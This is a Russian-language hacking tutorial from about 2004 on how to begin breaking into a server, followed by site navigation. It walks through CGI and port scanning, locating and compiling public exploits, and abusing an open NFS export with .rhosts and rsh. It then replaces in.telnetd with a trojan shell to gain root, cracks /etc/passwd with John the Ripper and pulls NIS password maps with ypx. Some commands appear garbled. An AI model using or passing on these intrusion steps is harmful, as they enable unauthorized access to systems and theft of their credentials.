C чего же всё таки начинать взлом сервера (сайта, странички и т.д.)
 
Итак, приступим! Первое с чего стоит начать это просканировать хост на стандартные CGi сценарии с помощью специальных сканеров которых слава богу сейчас предостаточно. Ну и что бы вы не потерялись в выборе могу посоветовать лучший (ИМХО) на сегодняшний день-это DCS-D@mned Cgi Scanner предоставленный нам хак-группой D@mnedr, его можно скачать с йх официального сайта http://www.cc.f2s.com/, еще правда есть сканер от группы Void (http://www.void.ru/) Но он немного уступает DCS по скорости сканирования. Ок, дальше, сканнер нашел уязвимый скрипт и вы спросите что же делать дальше???, а дальше вам надо найти то как использовать этот эксплоит, я дам вам несколько ссылок где можно найти описание этих ошибок:
 
http://qwerty.nanko.ru/ (наиболее полный но на Английском)
http://www.void.ru/
http://www.hack-crack.com/
 
или вы можете просто зайти на один из следующих сайтов и просто ввести уязвимый скрипт в строке поиска:
 
http://www.packetstorm.securify.com/
http://www.securityfocus.com/
http://www.rootshell.com/
 
Второе и пожалуй главное - это сканирование портов, для сканирования можно использовать любой сканнер портов(какой - на ваш выбор их сейчас везде полно), но опять же хотел бы обратить ваше внимание на сканнер Nscan который можно скачать тут http://www.nscan.hypermart.net/, этот сканер обладает просто потрясающей скоростью сканирования и довольно просто в управлении(правда на сайте лежит Shareware версия которая будет работать только 30 дней)
 
После того как сканер нашел открытые порты вам надо приконнектиться к каждому и посмотреть какая версия программного обеспечения установлена на нём, делается это с помощью клиента TELNET который есть даже в Вынь95 (98,2000), в командной строке TELNET вы пишете:
 
telnet>open www.target.com
и смотрите версию софта например: WU-FTPD 2.6.0(1) Sendmail QPOP IMAP и тд. После того как вы посмотрели версию вы должны найти эксплоит под эту версию, идете опять же на:
 
http://www.packetstorm.securify.com/
http://www.securityfocus.com/
http://www.technotronic.com/
 
 
и вводите в строке поиска название программы и его версию.
 
После того как вы скачали эксплоит его как правило надо скомпилировать - то есть привести к рабочему состоянию (как правило) так как большинство серверов в сети висит на *NIX то есть ЮНИКС ЛИНУКС ИРИКс и тд, то и компилировать его надо под этими системами. Если у вас нет установленного ЮНИКСА, то вам в любом случае (если хотите чего ни будь ломать нужен Юникс Шелл, то есть оболочка Юникс). Бесплатно её можно получить на http://www.nether.net/ и тому подобных серверах (введите на любом поисковике UNIX+SHELL+FREE)
 
Когда шелл получен и эксплоит скачен то можно приступать к компилированию, обычно эксплоит (в большинстве случаев) это программа на языке С, для компиляции будем использовать компилятор GCC, итак в командной строке оболочки пишем:
 
gcc -o exploit exploit.c и нижимаем Enter.
 
 
Хочу так же заметить что программы в Юникс подобный системах запускаются с "./"+имя программы, в нашем случае эксплоит будет запускаться:
 
>./exploit
 
Третье, еще один довольно популярный взлом системы это проверка на расшаренные папки, в Юникс то можно проверить с помощью утилиты showmount, итак из оболочки запускаем showmount:
>showmount -e www.target.com
и видим
 
/user/ Everyone
 
или что-то другое но если есть Everyone то значит папка открыта на монтирование для всех
дальше пишем
 
>mount -t nfs target.remote.com:/user /mnt
 
потом переходми в каталог cd /mnt/home и устанавливаем .rhosts
 
>echo www.target.com user/.rhosts
 
дальше делаем следующее:
 
>cat /etc/passwd
user::257:20::/: -смотрим пользователя и создаем такогоже у нас(если возможно)
 
> su - user
! Становимся им
 
$ rsh target.remote.com /bin/csh -i
 
Warning! No access to terminal, job control disabled!
 
! И заходим на удаленную машину
 
% id
 
uid=257(user) gid=20(stuff) groups=20(stuff), 7(sys)
 
% ls -ldg /usr/etc
 
! Каталог доступен на запись
 
drwxrwxr-x 10 bin bin 1536 Apr 10 01:45 /usr/etc
 
% grep telnet /etc/inetd.conf
 
telnet stream nowait root /usr/etc/in.telnetd in.telnetd
 
! Нашли программу, которая запустится
 
!под root"ом из нашего каталога
 
% cd /usr/etc
 
% mv in.telnetd in.telnetd1
 
! создаем троянского коня
 
% cat in.telnetd
 
>!/bin/sh
 
exec /bin/csh -i
 
 
% chmod 755 in.telnetd
 
! и запускаем его
 
% telnet 127.1
 
Connecting 127.1.
 
Warning! No access to terminal, job control disabled!
 
> chown user /etc;
 
! Делаем /etc своим
 
: command not found
 
> exit;
 
: command not found
 
Connection closed by foreign host.
 
> cd /etc
 
После того как у нас есть файл с паролями вы берете расшифровщик паролей Юникс - John The Ripper запускаете его и ждете пока расшифруются пароли потом из шелла коннектитесь на 23 порт и вводите логин с паролем и все вы в системе!
 
И последнее на что я бы хотел обратить внимание в этой статье это проверка NIS сервера. Из облочки запускаем
>rpcinfo -p www.target.com | grep bind и если видим что-то типа
 
120000 2 udp 2493 ypbind
 
То пробуем сдлать следующее:
 
>ypx -o target.passwd -g target.remote.com
 
Берём файл с паролями и запускаем подборщик.
 
На этом все!
 
Источник: CRACKZONE.ru
 
Collected by Naigo.All Rights Reserved. 2004 year
Soft By Naigo
Only The Best Soft
www.softbynaigo.narod.ru
GISMETEO.RU: график температуры на 10 дней для г. Москвы
Яндекс цитирования
NSD.ru - Безопасность в сети! Всё о хакерстве. Анонимность. Защита. Противостояние...
Официальный сервер еженедельной газеты "ЕвроФУТБОЛ"
Супер! >
Бесплатно размещу рекламу!
    пишите на fromsitesbn@front.ru
Бесплатная раскрутка сайтов
Топ-5 статей
 
Анонимность
 
Полное руководство по взлому IIS сервера
 
Список портов
 
Регулярные выражения в PERL
 
Программим на Shell-e
Главная | Internet | Work | Security | Media | Coding | Библиотека
Главная | Internet | Work | Security | Media | Coding | Библиотека
Hosted by uCoz